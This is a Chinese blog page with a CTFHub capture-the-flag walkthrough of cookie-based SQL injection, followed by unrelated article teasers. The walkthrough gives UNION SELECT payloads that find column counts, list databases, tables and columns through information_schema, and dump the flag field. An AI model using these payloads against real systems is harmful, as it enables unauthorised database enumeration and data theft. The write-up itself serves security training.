CTFHUB-SQL注入-Cookie注入

news2024/11/7 13:45:38

由于本关是cookie注入,就不浪费时间判断注入了,在该页面使用 burp工具 抓包,修改cookie后面,加上SQL语句,关掉burp抓包,就可以在题目页面显示结果了

判断字段数量

发现字段数量是2列

使用id=-1 union select 1,2 判断回显

回显位置是第一二列

查询数据库名

union select 1,database()

查询所有数据库名

union select 1,group_concat(schema_name)from information_schema.schemata

查询数据库中的表名

union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

发现了2个表

查询表中字段名

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='jhyppjlnjp'

查询字段下的数据

union select 1,group_concat(txpyjbpxlj) from sqli.jhyppjlnjp

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1819552.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

智慧工地:构筑未来建筑的智能脉络

智慧工地:构筑未来建筑的智能脉络

在科技日新月异的今天,智慧城市的建设已不再局限于城市生活的方方面面,而是深入到了城市发展的每一个细胞——工地。本文旨在深度剖析智慧工地的核心价值、关键技术及对建筑业转型升级的深远影响。 一、智慧工地:定义与愿景 智慧工地是指运…
阅读更多...
~$开头的临时文件是什么?可以删除吗?

~$开头的临时文件是什么?可以删除吗?

(2023.12.4) 在进行Word文档编辑的时候,都会产生一个以~$开头的临时文件,它会自动备份文档编辑内容,若是正常关闭程序,这个文档就会自动消失;而在非正常情况下关闭word文档,如断电&…
阅读更多...
智能座舱软件性能与可靠性的评估和改进

智能座舱软件性能与可靠性的评估和改进

随着智能汽车的不断发展,智能座舱在性能与可靠性上暴露出体验不佳、投诉渐多的问题,本文从工程化的角度简述了如何构建智能座舱软件的评估框架,以及如何持续改进其性能和可靠性。 1. 智能座舱软件性能和可靠性表现不佳 据毕马威发布的《2023…
阅读更多...
线程池前置知识

线程池前置知识

并发和并行 并发是指在单核CPU上,多个线程占用不同的CPU时间片。线程在物理上还是串行执行的,但是由于每个线程占用的CPU时间片非常短(比如10ms),看起来就像是多个线程都在共同执行一样,这样的场景称作并发…
阅读更多...
认识线性调频信号(LFM)和脉冲压缩

认识线性调频信号(LFM)和脉冲压缩

目录 1. 线性调频(LFM)信号:2.Matlab仿真3.脉冲压缩 微信公众号获取更多FPGA相关源码: 1. 线性调频(LFM)信号: 在时域中,一个理想的线性调频信号或脉冲持续时间为T秒,…
阅读更多...
CNAS认证是什么?怎么做?

CNAS认证是什么?怎么做?

在全球化日益深入的今天,产品质量和安全已经成为企业生存和发展的重要基石。而在这个过程中,CNAS认证作为一种权威性的认可机制,发挥着不可替代的作用。那么,CNAS认证究竟是什么?我们又该如何进行这一认证过程呢&#…
阅读更多...
派能协议,逆变器测试问题记录

派能协议,逆变器测试问题记录

问题一:逆变器无法进行逆变 通过抓取逆变器与bms的通讯报文,如下: 根据派能协议,报文标黄的对应充放电状态,30 30对应的数据为0 0,说明充放电状态全部置0,导致逆变器无法逆变。 问题二&#xf…
阅读更多...
安装好IDEA后,就能够直接开始跑代码了吗?

安装好IDEA后,就能够直接开始跑代码了吗?

我实习的第一天,睿哥叫我安装了IDEA,然后我就照做了。 之后,我把gitlab的代码拉下来后,发现好像没有编译运行的按钮,所以我就跑去问睿哥。睿哥当时看了看后,发现原来我没有安装JDK,他就叫我安装…
阅读更多...
下载elasticsearch-7.10.2教程

下载elasticsearch-7.10.2教程

1、ES官网下载地址 Elasticsearch:官方分布式搜索和分析引擎 | Elastic 2、点击下载Elasticsearch 3、点击 View past releases,查看过去的版本 4、选择版本 Elasticsearch 7.10.2,点击 Download,进入下载详情 5、点击 LINUX X8…
阅读更多...
LeetCode435无重叠区间

LeetCode435无重叠区间

题目描述 给定一个区间的集合 intervals ,其中 intervals[i] [starti, endi] 。返回 需要移除区间的最小数量,使剩余区间互不重叠 。 解析 由于要删除尽可能少的区间 ,因此区间跨度大的一定是要先删除的,这样就有两种贪心思想了…
阅读更多...
【ARM Cache 及 MMU 系列文章 6.2 -- ARMv8/v9 如何读取 Cache 内部数据并对其进行解析?】

【ARM Cache 及 MMU 系列文章 6.2 -- ARMv8/v9 如何读取 Cache 内部数据并对其进行解析?】

请阅读【ARM Cache 及 MMU/MPU 系列文章专栏导读】 及【嵌入式开发学习必备专栏】 文章目录 Direct access to internal memoryL1 cache encodingsL1 Cache Data 寄存器Cache 数据读取代码实现测试结果Direct access to internal memory 在ARMv8架构中,缓存(Cache)是用来加…
阅读更多...
D 25章 进程的终止

D 25章 进程的终止

D 25章 进程的终止 440 25.1 进程的终止:_exit()和exit() 440 1. _exit(int status), status 定义了终止状态,父进程可调用 wait 获取。仅低8位可用, 调用 _exit() 总是成功的。 2.程序一般不会调用 _exit(), 而是…
阅读更多...
海外盲盒APP系统开发:开拓国际盲盒市场

海外盲盒APP系统开发:开拓国际盲盒市场

在互联网的传播下,盲盒在国内外都掀起了风潮,我国盲盒将具有文化元素的盲盒商品投向海外市场中,获得了海外消费者的喜爱,给我国盲盒企业提供了新的商业机遇。盲盒的未知性让玩家在拆盲盒的过程中享受到更多的惊喜感,为…
阅读更多...
下载kibana-7.10.2教程

下载kibana-7.10.2教程

1、官网下载地址: Download Kibana Free | Get Started Now | Elastic 2、进入 Kibana下载界面,点击 View past releases 查看过去的版本 3、选择版本 Elasticsearch 7.10.2,点击 Download 4、点击 LINUX 64-BIT,进行下载 5、下…
阅读更多...
高并发挑战?盘点这些架构优化篇技巧,让你的系统焕发新生!

高并发挑战?盘点这些架构优化篇技巧,让你的系统焕发新生!

高并发挑战?试试这些垂直优化技巧,让你的系统焕发新生! 背景介绍性能优化优化方向架构演进历程第一阶段:单体架构弊端瓶颈Tomcat与数据库独立部署瓶颈 第二阶段:缓存架构结合本地缓存和分布式缓存瓶颈 第三阶段&#x…
阅读更多...
PHP简约轻型聊天室留言源码

PHP简约轻型聊天室留言源码

无名轻聊是一款phptxt的轻型聊天室。 无名轻聊特点: 自适应电脑/手机 数据使用txt存放,默认显示近50条聊天记录 采用jqueryajax轮询方式,适合小型聊天环境。 访问地址加?zhi进入管理模式,发送 clear 清空聊天记录。 修改在…
阅读更多...
C++ 23 之 构造函数和析构函数

C++ 23 之 构造函数和析构函数

c23构造函数和析构函数.cpp #include <iostream> #include <string> using namespace std;class Person2{ public:// 构造函数 没有返回值&#xff0c;不能写void;函数名和类名一致&#xff1b;可以设置参数&#xff0c;可以函数重载&#xff1b;系统自动调用&…
阅读更多...
融资融券是什么?深入解析股市杠杆交易!

融资融券是什么?深入解析股市杠杆交易!

01 融资融券是什么&#xff1f; 融资融券&#xff0c;简称两融&#xff0c;又称证券信用交易或保证金交易&#xff0c;是股票市场中的一种交易方式。在这种交易中&#xff0c;投资者可以向证券公司借入资金&#xff08;融资&#xff09;来购买股票&#xff0c;或者借入股票&am…
阅读更多...
ATFX汇市:美国5月通胀率回落,降息预期刺激黄金走高

ATFX汇市:美国5月通胀率回落,降息预期刺激黄金走高

ATFX汇市&#xff1a;据美国劳工部发布的最新数据&#xff0c;美国5月核心CPI年率最新值3.4%&#xff0c;低于前值3.6%&#xff1b;名义CPI年率最新值3.3%&#xff0c;低于前值3.4%。核心CPI年率和名义CPI年率双双下降&#xff0c;超出此前市场预期&#xff08;预期为整体保持不…
阅读更多...
ASM字节码插桩实现点击防抖

ASM字节码插桩实现点击防抖

思路&#xff1a;在点击事件onclick的时候&#xff0c;将view的onclick在给定的时间给拦截掉。以前我们可能都是用一个util来拦截&#xff0c;这样在每个点击事件都得去判断&#xff0c;那么这里就用字节码插桩的形式来实现一下。 ASM的引入 dependencies {implementation gr…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023